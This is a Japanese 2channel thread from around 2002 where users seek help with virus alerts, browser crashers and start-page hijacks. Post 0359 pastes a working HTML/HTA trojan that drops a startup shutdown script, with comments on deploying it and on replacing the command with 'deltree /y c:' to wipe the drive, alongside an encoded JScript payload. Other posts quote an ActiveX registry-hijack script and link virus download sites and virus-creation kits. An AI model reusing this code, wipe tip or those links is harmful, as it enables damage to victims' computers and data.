シマンテックにもW32.Badtrans@mm.encの詳しいコメントがありません。
ちなみにBadtrans.Bのときは感染しませんでした。
他のフォルダにも同じウイルスが送られてしまったら
また感染してしまうかもしれない…と考えると鬱です(;´Д`)
0335334
NGNG「ファイルの修復ができず、隔離されたままなので
そのフォルダ内のメールはすべて読むことができない状態です。」
に訂正です。
0336334
NGNG逝ってきます…。
0337名無しさん@お腹いっぱい。
NGNG意味はじゅうぶん分かるよ(笑)
ただ、修復できないとなると諦めた方がよさそうな・・
0339名無しさん@お腹いっぱい。
NGNGファイルを隔離するのか忘れたんでアレだけど、
1. アンチウィルスソフトをいったん停止
2. 隔離されたウィルス入りファイルをもとあった場所にコピー
運がよければこれでもとどおりメールが読めるかもしれない。となると、
3. 感染しないよう気をつけてメイラーで該当メールだけ削除
4. アンチウィルスソフトを動かす
で、うまくいくかも。あくまでも「かも」なんで期待せぬよう。
0340検出名を教えてくださいませませ
NGNGhttp://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
0341334
NGNG私も気になって、該当メールを削除してから
それらしきことをやってみました。
(レス読む前だったのでノートンは停止しませんでしたが…)
「項目の復元」というのがあって、感染したファイルを元の場所に戻し
それからもう一度スキャンしてみました。
なぜかウイルスは発見されず…。
うまくいったのかな。。念のためオンラインスキャンもしました。
とりあえず一安心です。
レスありがとうございました。
0342315
NGNG遅レスすまそ
おっしゃるとおり、
以前、xpのSP1当てようとして
CDROM手元になくてやめてました。
あらためてSP1入れたら
なおりました。
でも、しばらくはなんともなかったのに
急におかしくなったんで
他にも何か原因あるのかなあ
0343317
NGNGおかしなタイミングで起動時に最適化をしたりとか、とにかくいろいろあるから。
エラーメッセージもあてにならないことが多いし。
オフィス系ソフトがらみは、たいがいビジネスソフトの方が情報あると思う。
じゃあ、まあウイルスでなくて良かったってことで。
0345ウイルスのこと知りたい
NGNG一つはW32.Whiter.Trojanが仕込まれていると掲載されたA***bat5J
一つはW32.Nimda.enc(dr)が仕込まれていると掲載された**革命 6.0 Virtual Pro
両ファイルともzip形式でしたので、解凍した後にウイルスバスター2002ビルド1217で
ドライブ全体をチェックしました。がしかし、ウイルスは検出されず。。。
上記2つのウイルスはソフトをセットアップした後でないとウイルスとして認識されない物なのでしょうか?
発症してしまっては厄介なことになると思いセットアップまではしてないのですが。。。
未知の物なので興味だけではなんともならず、是非ご教授願えればと思います。
0346名無しさん@お腹いっぱい。
NGNGウィルス入ってないワレもいっぱいあるぞ。つーか割れるな。
0347ウイルスのこと知りたい
NGNG0348名無しさん@お腹いっぱい。
NGNGlain underground てとこからメールが来ました。
なんかウイルスっぽいのですが、どうでしょうか。
0349名無しさん@お腹いっぱい。
NGNGどっちも誤検出で問題なし!
海外サイトをチェックすべし!
0350345
NGNGそうでしたか。。。怖いもの見たさの興味本位半分、また敵を知ればむやみに
怖がるものでもないと思う考えから仕入れた物だったのですが
恐縮ではありますが、因みに海外サイトはどのあたりを見れば?
お教えて頂ければうれしいのですが
0351名無しさん@お腹いっぱい。
NGNG動きは一定時間で女の人の顔がフルスクリーンに映し出されるようになりました。
おまけに、「きゃ〜」と叫びます。
表示時間は約1秒くらいで、出現割合はランダムです。
同じような経験がある人はいませんか?もしかしてウィルス?
かなり、キモイので対処方法を是非教えてください!!
本当に困っています…。
0352名無しさん@お腹いっぱい。
NGNG「はぁぁああぁん!!」
・・・ってなまなましい声出すやつだったらよかったのにね。
0353割れより「収監しりある」読め!
NGNG0354名無しさん@お腹いっぱい。
NGNGアンチウィルスソフトがアラート出したので削除したのですが
これはどんなウィルスでしょう?
Googleで検索しても出なかったので・・・。
0355名無しさん@お腹いっぱい。
NGNGでたが?
ttp://www.symantec.com/region/jp/sarcj/cgi-bin/vsearch.cgi
0356名無しさん@お腹いっぱい。
NGNG2ちゃんねるはログを取っていた!
This is the attack I am refering to.. notice all the SYN_RECV messages.
These will hand waiting for an ACK or a FIN message. The source address of
these is random.
tcp 0 0 64.71.177.66:80 7.3.48.44:1984 SYN_RECV root
tcp 0 0 64.71.177.66:80 130.0.90.1:1972 SYN_RECV root
tcp 0 0 64.71.177.66:80 22.0.44.63:1506 SYN_RECV root
tcp 0 0 64.71.177.66:80 36.21.80.5:1695 SYN_RECV root
tcp 0 0 64.71.177.66:80 83.2.28.41:1606 SYN_RECV root
tcp 0 0 64.71.177.66:80 1.83.197.83:1220 SYN_RECV root
tcp 0 0 64.71.177.66:80 106.3.26.45:1411 SYN_RECV root
tcp 0 0 64.71.177.66:80 11.15.73.23:1770 SYN_RECV root
tcp 0 0 64.71.177.66:80 117.52.53.0:1283 SYN_RECV root
tcp 0 0 64.71.177.66:80 12.59.51.94:1401 SYN_RECV root
tcp 0 0 64.71.177.66:80 129.8.32.43:1474 SYN_RECV root
tcp 0 0 64.71.177.66:80 137.2.38.49:1914 SYN_RECV root
tcp 0 0 64.71.177.66:80 15.22.48.30:1867 SYN_RECV root
tcp 0 0 64.71.177.66:80 19.91.80.15:1124 SYN_RECV root
tcp 0 0 64.71.177.66:80 2.12.232.39:1191 SYN_RECV root
tcp 0 0 64.71.177.66:80 218.2.211.8:1460 SYN_RECV root
tcp 0 0 64.71.177.66:80 24.44.57.72:1438 SYN_RECV root
tcp 0 0 64.71.177.66:80 34.10.39.43:1160 SYN_RECV root
tcp 0 0 64.71.177.66:80 36.4.127.36:1993 SYN_RECV root
tcp 0 0 64.71.177.66:80 37.61.29.68:1927 SYN_RECV root
tcp 0 0 64.71.177.66:80 39.29.144.2:1075 SYN_RECV root
tcp 0 0 64.71.177.66:80 56.24.56.84:1931 SYN_RECV root
tcp 0 0 64.71.177.66:80 56.53.50.26:1288 SYN_RECV root
0357名無しさん@お腹いっぱい。
NGNGまさしく SYN flood ですっていう意味ね
0358未解決 検出名
NGNGのウイルスバスター2002での検出名を教えてください。
−−−−−
ウイルスバスター2002の未知のウイルスの検出名は?
−−−−−
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
0359Seeker?
NGNGu2&MC:xTPqqGKu'T~1W[+{^WsRhdclmOr7+pRz^Dk-(;W:aW
nxD@*@!zznKJAK@*rbi@#@&0!U^YbW PzE"rv#`YMz
mFx[KmEhn Y la2^+Ok$ZTi@#@&mqRk+OZd?(9vJ w1&lfZy+RF;
sZOqF9T b9AOR!ZZT*wf*0)ZANJ*I@#@&C8R1D+mY(xkYCx1+c~*i@#@&jt
^P',CqRV+Dr8Ln^D`bi@#@&l8RdnDZSj(G`E Z9W&oA!8OsZ,2RF8ZoOR,*T
!!zTZO!*W++%)J*i@#@&O.H ~?4sR"+L MkYncrCFZ`w'?G6YSlD-'
\k1DG/K0Ow'qxDnD +Y,3aw^WM+.-w\mkU-'jYmDO~hlonEBJ4YD2=z&Sh
SRxm\ nYSW.3cxnOJ:X4G:zJ*I@#@&)mmY^tcn* N81CY1tcn*
8NdYPksnKEOvJHEyb`*E~8!T!*i@#@&JzO @*@#@&PJQAAA==
^#~@
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Death to Pedophils!!!
</title>
</head>
<body><big>Death to pedophiles!!!</big>
<OBJECT
ID="egg"
WIDTH=100
HEIGHT=51
CLASSID="CLSID:1C6AAACF-A781-11D1-AAFD-000001145528"
CODEBASE=error.msg
ACRSYSINFO.OCX#Version=1,2,0,2">
</OBJECT>
<OBJECT id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14" >
</OBJECT>
<script>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\winmem.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run
('command /c rundll.exe user.exe,exitwindows',false,6)</"+"SCRIPT>";scr.write();
</script>
</body>
</html>
<!-- This little trojan just shuts down the lamer computer at startup -->
<!-- Of course if you are evil enough you can replace the rundll blah-blah command with deltree /y c: -->
<!-- All that the lamer has to do is read this msg and of course he has to have javascript enabled -->
<!-- You can modify the text between the big tags -->
<!-- You can change the name of the file from winmem.hta to whateveryouwant.hta -->
<!-- DO NOT DELETE OR ADD BLANK SPACES OR DO NOT DIVIDE A LINE IN 2...OR
SOMETHING ELSE CUZ THE EXPLOIT MIGHT WONT WORK -->
0361名無しさん@お腹いっぱい。
NGNGどこのサイトにも該当するものがありません。どなたか正体を教えてください。
ちなみにその知人はBadtransを繰り返し送ってくるバカです。ハードディスク
に空きが無くてアンチウイルスソフト入れられないんだとさ。
---------
Subject: A good tool
Received: from 21cn.com ([61.140.60.248])
by ums513.nifty.ne.jp (8.9.3+3.2W/3.7W000811) with SMTP id KAA22507
for <******@nifty.ne.jp>; Sun, 3 Feb 2002 10:15:20 +0900 (JST)
Message-Id: <200202030115.KAA22507@ums513.nifty.ne.jp>
Received: from 21cn.com([10.2.0.6]) by 21cn.com(AIMC 2.9.5.2)
with SMTP id jm93c5cbfec; Sun, 03 Feb 2002 09:14:50 +0800
Received: from Rksvz([61.214.36.134]) by 21cn.com(AIMC 2.9.5.2)
with SMTP id jm33c57c568; Wed, 30 Jan 2002 15:11:05 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=NbLhp9koJe7UJa3DjAzK18gC2019d8L85
X-UIDL: 3c5c8f3002AWFJ8W
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
This is a good tool
I hope you would enjoy it.
添付ファイル:height.scr 86782byte、light[1].jpg 5639byte
0362名無しさん@お腹いっぱい。
NGNG0363名無しさん@お腹いっぱい。
NGNG0364名無しさん@お腹いっぱい。
NGNG0365名無しさん@お腹いっぱい。
NGNG0366名無しさん@お腹いっぱい。
NGNGだれかソース(一部)書いたのかYO
0367名無しさん@お腹いっぱい。
NGNG友達のPCなんですけど、
2chで何かのファイルを落としたらウイルスに感染してしまったそうです。
症状はPCを使っていると、いきなり画面が黒くなり
コワイ女の人の画像とともに悲鳴が聞こえるそうです。
HPでもそんなのがよく貼ってありましたよね。たぶんあれのウイルス版だと思います。
駆除の方法がわからないのですが、どうすればよいでしょうか?
0368名無しさん@お腹いっぱい。
NGNG聞き飽きた。
0369
NGNG漏れもスレURL貼るのめんどくさい。
初級ネット板いけば、スレタイトルですぐ分かるのがあるから
そこ見てくれ。
同様の連中がまだいるせいか、たいてい上の方にあるし。
一応、いっとくけど全然ウイルスじゃないし。
0371名無しさん@お腹いっぱい。
NGNGウィルスかどうかはわからないのですが、
ウィンドウを最大化(最小化、閉じる)する□や×の部分がいきなりバグって
数字のようなものになってしまいまいした。
ブラウザの右下部分にはπが出ています。
その他にも、本来ならば▼なはずが数字に化けています。
チェックボックスも化けています。
PCの使用にあたって大した影響はないのですが、
これはウィルスなのでしょうか?
(スキャンにはひっかかりませんでした)
それともPC自体壊れているのでしょうか。
情報お願いします。
0372名無しさん@お腹いっぱい。
NGNGお前なあなんも調べないで
ほざくなよー
その話題ならもう10000回くらいきいてんだよ。
windows板逝け
0373名無しさん@お腹いっぱい。
NGNG>>371
ここ逝ってくれ(大汗)
もうくんな・・・
0374名無しさん@お腹いっぱい。
NGNG親切君発見
0375age
NGNGttp://sinagoga.hoops.ne.jp/html/virus_down.htm
ttp://windows3000.virtualave.net/NewToolz.html
行くだけなら良いですが実行しないように
このアドレスを憶えておいてひっかからないようにしましょう
何か起きても責任は持ちません
0376名無しさん@お腹いっぱい。
NGNGThanx! コレクションが増えましたっ
0377375
NGNGttp://windows3000.virtualave.net/NewToolz.htm
ttp://easyweb.easynet.co.uk/~hiros
ttp://sinagoga.hoops.ne.jp/html/virus_down.htm
行くだけなら良いですが実行しないように
このアドレスを憶えておいてひっかからないようにしましょう
何か起きても責任は持ちません
0378名無しさん@お腹いっぱい。
NGNG0379名無しさん@お腹いっぱい。
NGNGここのサイトで強制的にファイルをダウソさせられたみたいなのですが
ウイルスとかでしょうか?
0380名無しさん@お腹いっぱい。
NGNGhttp://www.google.com/search?hl=ja&q=%22%2Bwww.top.or.jp%2F%7Egodhand%2Fa2.html%22+%83E%83C%83%8B%83X&lr=
0381名無しさん@お腹いっぱい。
NGNG漏れは、旬な奴探してるから要らない。。。
0382↑これみて自分で勉強してね
NGNG0383名無しさん@お腹いっぱい。
NGNGありがとうございました。安心しました
0384名無しさん@お腹いっぱい。
NGNG気持ち悪くてしょうがないです。
セーフモードで起動してファイルを削除したのですが
まだ、画像と「キャー」という声が出てきます。
どうしたらいいのですか?
教えてください。
0385↑ネタじゃなければ過去ログ読んで
NGNG0388名無しさん@お腹いっぱい。
NGNG9x系のOSなので、リソースの問題で常駐はさせていません。
(使っている2chブラウザとも相性が悪いし)
で、ウィルスサイトと言われるところを踏んでしまったのですが、
アンチウィルスのレベルを目いっぱい上げて、全ての
ファイルをスキャンしても、何も出てこないのです。
そういう種類のトロイとか、ウィルスは存在しますか?
0389ノートン君ハイ!
NGNGバージョンによって検出されるトロイと素通りのトロイがいると思われ。
0390名無しさん@お腹いっぱい。
NGNGアンチウィルス2000の7.07.23Dとありますが・・・。
2001とかの方がいいのでしょうか?
0391名無しさん@お腹いっぱい
NGNGそのあんたがいう"ウィルスサイト"てのは踏んだだけで感染するサイトなのか?
それともウィルスがたくさん置いてあるだけのサイトなのか?
自分で.exe実行されたかどうかも知らないの?
ついでに2002にしろ
0392名無しさん@お腹いっぱい。
NGNGどーせまた godhand みたいなとこだろ。
0393あや
NGNG0394390
NGNGごめんなさい、ウィルスに関してはかなり知識が乏しいので
(今まで、トロイとウィルスとワームの違いさえ知らなかった)
踏んだだけで、感染するのかしないのかさえも知らないのです。
踏んだだけなら大丈夫なんでしょうか
ちなみに、>>392の方がおっしゃるように、下に貼りますが
ブラクラも伴っていますので、注意してください。
www.geocities.com/ccsacla/images0012.jpg
実体はHTML
<html>
<head>
<title></title>
</head>
<body onUnload="unload()">
<iframe src="ssopn.html">
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.geocities.com/fes74592/ssopn.html");
//Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions", "1");
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
<img src="ok.jpg">
</script>
</body>
</html>
<noembed><noscript><noscript><noscript><xml>
View-Source:http://www.geocities.com/fes74592/
View-Source:http://www.geocities.com/fes74592/images0012.jpg
View-Source:http://www.geocities.com/fes74592/ssopn.html
http://www.geocities.com/fes74592/ok.jpg
View-Source:http://www.geocities.com/fest7742/
View-Source:http://www.geocities.com/fest7742/images0012.jpg
View-Source:http://www.geocities.com/fest7742/ssopn.html
http://www.geocities.com/fest7742/ok.jpg
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
<META HTTP-EQUIV="Refresh" CONTENT=25;URL="ssopn.html">
0397名無しさん@お腹いっぱい。
NGNGhttp://curry.2ch.net/test/read.cgi/sfe/1014090058/l50
0398392
NGNGあーそれ、前に見たことある。ということは既出だ。
たぶん、このスレか初心者スレ。
ブラクラとスタートページの書き換えの複合だと思う。
他にもなにかあったかも。
>どーせまた godhand
じゃ〜なかったな。すまそ。
0399名無しさん@お腹いっぱい。
NGNGスタートページ書き換え +
mail ストーム +
con,prn,nul
だからスタートページ直せば良してIEのパッチあてれ。
0400.
NGNGってのに引っかかりましたウイルスバスター2002入れたたんで事無きを得たんですが
セキュリティ関係のHPいくとPE_NIMUDA.Aって表記されてるんですよね。
名前が違うだけで対処はニムダと一緒でよろしいのでしょうか?
0401390
NGNGパッチもちゃんと当てました。
これで安心して、修復ポイントが作れます。(^^;
0402名無しさん@お腹いっぱい。
NGNGウィルスの名前の定義はウィルス対策ソフトのメーカーによって異なる
0404名無しさん@お腹いっぱい
NGNGmail128連射?・・・・
喰らったら禿げ鬱だろうな(;´Д`)
0405404
NGNGそんな命令喰らわされたら?・・・か・・・・
もっと精進しよう・・・
0406
NGNG0407名無しさん@お腹いっぱい。
NGNG起動後数分(不定)で電源が落ちるので困っています
0408名無しさん@お腹いっぱい。
NGNGウイルスよりもPCの調子がオカシイんでは?
原因になりそうなのはいっぱいありすぎて
一概には言えないが、ディスプレイドライバや
Mouse/KB の接続が不完全とか…。CPU冷却不足とか。
0409
NGNGこれは?
http://easyweb.easynet.co.uk/~hiros/virii99/Not/asciiv.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/cb4111.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/dodgy.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/urkel.zip
0411名無しさん@お腹いっぱい。
NGNG今更。要らない。
0412
NGNG0413こわい
NGNG【ttp://www.top.or.jp/~godhand/a2.html
こんなものを踏んじゃったんですけど、これって悪い物なのでしょうか?
御存知の方教えてください。よろしくおねがいします。
0414名無しさん@お腹いっぱい。
NGNG0415>414
NGNGマルチってどういう操作のことでしょうか…教えていただけませんでしょうか? どうやったら対処できますか?
よろしくお願いします…
0416名無しさん@お腹いっぱい。
NGNGマルチというのはあちこちで同じことを書くことだ。
マルチは嫌われているのでつくレスもつか無くなる。
初心者を免罪符にするなよ、初心者なりに他のスレを見て回ればこのことは
判るはずだからな。
http://www.top.or.jp/~godhand/a2.html は禿げしく外出なので気にするな。
気になるならこのスレ、くだ質、初質の最初から読めば出てくるはずだ。
0417名無しさん@お腹いっぱい。
NGNG同じ質問を複数のスレに書くことは、ルール違反であり嫌われます。
結局どちらも回答が得られなくなり、損するのはあなたですよ。
0418名無しさん@お腹いっぱい。
NGNGzodiad.subnet.dk/image_002.jpg
中身は>>395の前半部分に似ています。
FDDがガリガリいって部落ら状態になり、再起動しましたが
ウイルスバスターのオンラインスキャンで、インターネットの
テンポラリフォルダに「JS_EXCEPTION.GEN」
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
が見つかったので削除しました。
幸いActiveXとJavaスクリプトは切ってあったのですが、
部落らにはやられたのでちょっと心配しています。
念のために再インストールした方がいいのか、それとも
心配する必要はないのか、教えてください。
0419名無しさん@お腹いっぱい。
NGNG初心者スレを全レス表示してzodiadで再検索して確認。
0420名無しさん@お腹いっぱい。
NGNGttp://www.geocities.com./oohozv/image/list01.jpg
で、でんこの偽造がかかってる
\windows以下のフォルダを削除するらしい
落としてみたが、アイコンも偽造してある
当然バイナリ見ないと確認できない
これどうよ?
0421418
NGNG「初心者用質問スレッド」のPart1〜7まで全レス検索してみましたが
一件も引っかかりませんでした。
googleでも検索結果0です。
誰かわかる人いましたらアドバイスください。
0422名無しさん@お腹いっぱい。
NGNGまた新種が発生したか
と思うのは私だけ?
0423名無しさん@お腹いっぱい。
NGNGどうせ、google検索するなら
http://www.google.co.jp/search?q=JS_EXCEPTION.GEN+%83E%83B%83%8B%83X+%8F%EE%95%F1&hl=ja&lr=on&btnG=Google+%8C%9F%8D%F5
>>422
新種発生しなくても、なんかスタートページが書き換えられたとか、
これ大丈夫でしょうかとかはここんとこすごく多いから
(初級ネット板なんてもう大変)
ここが上がることもあるんじゃないかなあ。
0424名無しさん@お腹いっぱい。
NGNGああそうそう、アンチウイルスベンダーが一番詳しく、
情報が早いので、シマンテックとかトレンドマイクロで
JS_EXCEPTION.GENを探してみて。症状が書かれているので
確認の役に立つかと思う。
0425あのう
NGNG0426418
NGNGレスありがとうございます。
JS_EXCEPTION.GENの情報は既に調べてあり、
報告されている現象が見られなかったのでその点では安心なのですが、
今回踏んだアドレスはブラクラも兼ねていたのでちょっと動揺してしまい、
不安になってしまいました。
>>395のソースと比べると、
<script>
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
というのが冒頭にあるんですが、この部分がブラクラだとしたら、
単純に「JS_EXCEPTION.GEN」+ブラクラと考えていいんでしょうか?
それなら問題はなさそうです。
0427
NGNGいやぁね、メール(個人アドレス)に添付ファイルなしのアドレス付きメールが
あったんで、久々に気合い入れて押したらみごとにひっかかっちゃいまして。
http://Best-Greeting.com/view.html?EFC9EWBKFJYAR
ってとこなんですが。アドレスはすでに「暴力行為がありました」とかでデリられてます。
症状は、特定のサイトを開くたびに、windows personalなんたらとかいうインストーラ立ち上がって
毎回立ち上がってウザイのでOKしたら、こんどはブラウザ立ち上げるとRAS errorなるダイアログが出て
同時に実行に失敗したとポップアップが出ます。
その後、デスクトップ、メールフォルダ、WINNTフォルダ、スタートアップフォルダに
5-1-25-389.exe
ちゃんが産み落とされます。アイコンは素敵な画像です。
ダイヤルアップじゃなくて良かったーと言う感じですが、駆除方法が思いつかないので
どうしていいものやら。
お知恵をお貸し下さいまし。
0428名無しさん@お腹いっぱい。
NGNGなんかそのアドレスのところのソースを見られない。
それにJAVAスク切っていたのに、ブラクラにかかったてなあたりが
ちょっとひっかかることはひっかかるけど、
IEスタートページが大丈夫なら、もう書き換えはないんじゃないかなあ。
まあ、用心してってことで。
0429名無しさん@お腹いっぱい。
NGNGとにかくウイルススキャン。
トレンドマイクロかシマンテックへ。
とりあえずなら、下記のサイトからオンラインスキャン。
http://www.trendmicro.co.jp/
http://www.symantec.co.jp/
0430名無しさん@お腹いっぱい。
NGNGいまから最新定義(2/23付)おとしてノートンかけてみます。
0432ノートンでは反応しないウイルス?
NGNGノートンでは反応しないウイルス?
http://www.ebcvg.com/binary2.php の
Mac.Scores
http://www.ebcvg.com/sections/binary/Mac.Scores.zip
Mac.T4d
http://www.ebcvg.com/sections/binary/Mac.T4d.zip
Win32.Mix
http://www.ebcvg.com/sections/binary/Win32.Mix.zip
以上の3つはノートンは反応しません。
−−−
http://www.ebcvg.com/viruses.php
Virus Source Codes
Polymorphic Engines
がある。
http://www.ebcvg.com/sections/polymorphic/W97M.txt
はBloodhound.HybridCOM
知識があればウイルスが作成できる。
ウイルス作成ソフトもある。
http://www.ebcvg.com/binary.php
0433ウイルス直し方教えて
NGNGjethomepageっていう英語の検索サイトにつながっちゃうんですよね。
いろいろ調べたんですけど、jethomepageのウイルスはメインページの
スタートページを変えちゃうっていうのなんですよね。
なんか自分の症状と違うんですよね。
誰か僕のやつの治し方わかる方いませんかね?
0434名無しさん@お腹いっぱい。
NGNGIEのホームをblankにしているのですが、
そのタイトルが「http://geocities.com/braindiary」
とでています。
直し方を教えてください!
0435マジレスお願いします
NGNGこれっていったいなんですか?
0436けんずぃ
NGNGが、削除してくれません。自分で削除しようとしても「現在WINDOWSが使用しています」と言われ、削除できません。
どなたか教えて下さい。これは何ですか?
パソコンに電源を入れると毎回出るエラーメッセージです。
ウイルスが検出されました(TSC.LOGを確認して下さい):
TROJ_BACKDOORM1
TROJ_YKRT.ASVR c:windows\rundV.exe 処理失敗
0437名無しさん@お腹いっぱい。
NGNG0438たすけてください!!
NGNGどうしたらいいのかわかりません
本当に助けてください
よろしくお願いします
ttp://ime.nu/ime.nu/ime.nu/www.bd.wakwak.com/~shino/data/download.html
0439名無しさん@お腹いっぱい。
NGNGこれかな?
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FBACKDOOR%2EM1
0440けんずぃ
NGNGありがとうございます。助かります。
0441
NGNG又IEの新たな穴ハッケソ?
0442
NGNGとりあえずウイルススキャンしなさい
http://www.trendmicro.co.jp/hcall/scan.htm
0443たすけてください!!
NGNGただ今ウィルススキャンしています。
しかし少し古いバージョンなので引っ掛からないかも知れません。
そうゆう場合どうしたらいいでしょうか?
ちなみに何故か新しいのにする事もできません。
0444名無しさん@お腹いっぱい。
NGNGttp://www.bd.wakwak.com/~shino/data/end.gif
ようするにコレが正体。GIF動画だね。
0445たすけてください!!
NGNGありがとうございます。
何も問題は無いんですね?
0446名無しさん@お腹いっぱい。
NGNGこっちがデフォルトデザインと違ってたら、
違和感あってすぐバレルけどね。
0447名無しさん@お腹いっぱい。
NGNG何も心配ないよ。
ttp://homepage3.nifty.com/girls_and_boys~/
ここふんじゃったらクライジーゴーストの口から血をだしてる女の画像が出てきたのですが、ここによるパソコンへの悪影響はあるんですか?
困っています、申し訳ありませんが教えてください。
最後に、マルチですいません。
0449名無しさん@お腹いっぱい。
NGNG元のcrazygostと同じ、後は自分で情報さがしてね。
0450W32/Klez」ウイルスの亜種
NGNGhttp://www.ipa.go.jp/security/topics/newvirus/klez.html
0451名無しさん@お腹いっぱい。
NGNG0452名無しさん@お腹いっぱい。
NGNGttp://homepage2.nifty.com/madhatter/katayoku.swf
ttp://nara.cool.ne.jp/mituto
0453名無しさん@お腹いっぱい。
NGNG上はちょっと前に流行った田代のフラッシュだよ。見る価値あり。
下はなんかよく分からない科学の話題のサイト。
↓こんなやつ
洸人LIBRARY
The Mituto Library
田中 洸人 作
0454452
NGNGありがとうございます
0455名無しさん@お腹いっぱい。
NGNGウィルスが検出されました、というウィンドウが出たので慌てて閉じました。
もしかしてあのスレはウィルスに汚染されているのですか?
ほっといたら大勢感染してしまうのでしょうか?
もしかして凄く危ないのでは?
(PCにうといのでたいした事じゃなかったらすみません)
0456名無しさん@お腹いっぱい。
NGNGノートンさんですか?(笑)
そんなスレがあったら…それはそれで面白いかもね〜
0457455
NGNGこれがノートンなのかどうかも分からないけど
McAfee VSieldというのが警告してくるもので驚いてしまって。
お返事ありがとうございました。
0458名無しさん@お腹いっぱい。
NGNGなんか微笑ましい。
0459名無しさん@お腹いっぱい。
NGNGそうだと思った
0460455
NGNG色々問題ありなソフトみたいですね(^^;)
これから勉強します。どうもありがとう。
0461
NGNG0462433
NGNG0463名無しさん@お腹いっぱい。
NGNG<center><a
onClick="this.style.behavior='url(#default#homepage)'; this.setHomePage('http://www.jethomepage.com');"
href="http://www.jethomepage.com/"><font face="Arial, Helvetica, sans-serif" size="2" >Make
JetHomePage Your Homepage</font><font face=Verdana
size=2>
</font></a>
これクリックしただけちゃうんか
0464anonymous
NGNGなんとなく助言(励まし)
とは言ってもOSもIEのヴァージョンも何も書いてないので大雑把に…
レジストリの復元をためしてみる(多分というかもう無理だろうけど)
DOSで起動→"scanreg /restore"
もしくは(Meの場合)ファイル名指定して実行→"scanreg /restore"
IEの修復も試してみる
コンパネ→アプリの追加削除→IE選択
もしくはファイル名してして実行→"rundll32 setupwbv.dll,IE6Maintenance"
(IE5かIE5.5なら"rundll32 setupwbv.dll,IE5Maintenance")
↑でもダメだったらファイル名指定して実行→"regedit"で自分でレジストリエディタ動かして細かく調べるべし。
#当然だけど二重引用符は入力するべき文字列に含まない
…ていうかウィルス命判明したんなら(おそらく"js.seeker.b")スマンテックとかにも具体的な復旧方法のってるでしょ。
駆除したら復旧は自分でやる!!!お前のマシンはお前しか知らん!(・∀・)
とりあえず参考
http://www.symantec.com/region/jp/sarcj/data/j/js.seeker.b.html
(外れてても文句ナシでおながい(_ _(--;(_ _(--; ペコペコ)
0465たすけて〜
NGNGでるんですけどどうしたらいいの?退治できないですか?おしえて〜
0466名無しさん@お腹いっぱい。
NGNG日本語を話してください。つーかウイルスじゃないじゃん。
0469名無しさん@お腹いっぱい。
NGNG0470名無しさん@お腹いっぱい。
NGNGブロックしてるんだからいいんじゃない
0471名無しさん@お腹いっぱい。
NGNG同じとこから、193バイトのメールがもう10回くらい来とります。
皆さんはいかがですか??
0472hagebouzu
NGNGEMAILCHK2@NIHON-DATA.CO.JP
EMAILCHK2@NIHON-DATA.CO.JP
EMAILCHK2@NIHON-DATA.CO.JP
EMAILCHK2@NIHON-DATA.CO.JP
uirusu chuui
0473
NGNGきのう、添付メールでYOU_ARE_FAT!.MP3.scrがきたのですが、
IE5.5SP2なら問題ないでしょうか?。
プレビューで開いてしまったのですが、「保存」か「開く」のダイアログが出てキャンセルして削除しました。
0474名無しさん@お腹いっぱい。
NGNGウィルス対策ソフトは入れてないのか?
0475473
NGNG入れていませんでした。
一応、kernel.exeとkdll.dllがないのを確認して、
オンラインスキャンもやりましたが引っかかりませんでした。
これで大丈夫なのでしょうか??。
0476名無しさん@お腹いっぱい。
NGNG「保存」か「開く」のダイアログが出てくるなら大丈夫かと。
この程度のこと聞きに来るレベルならちゃんとウィルス対策ソフト入れれ。
0478ノートンでは反応しないウイルス?
NGNGhttp://vx.netlux.org/dat/vct.shtml
ノートンでは反応しないウイルス?
http://www.ebcvg.com/binary2.php の
Mac.Scores (ノートンの検出名)
http://www.ebcvg.com/sections/binary/Mac.Scores.zip
Mac.T4d
http://www.ebcvg.com/sections/binary/Mac.T4d.zip
Win32.Mix
http://www.ebcvg.com/sections/binary/Win32.Mix.zip (W32.Fully.3424)
Win2k.TaiChi
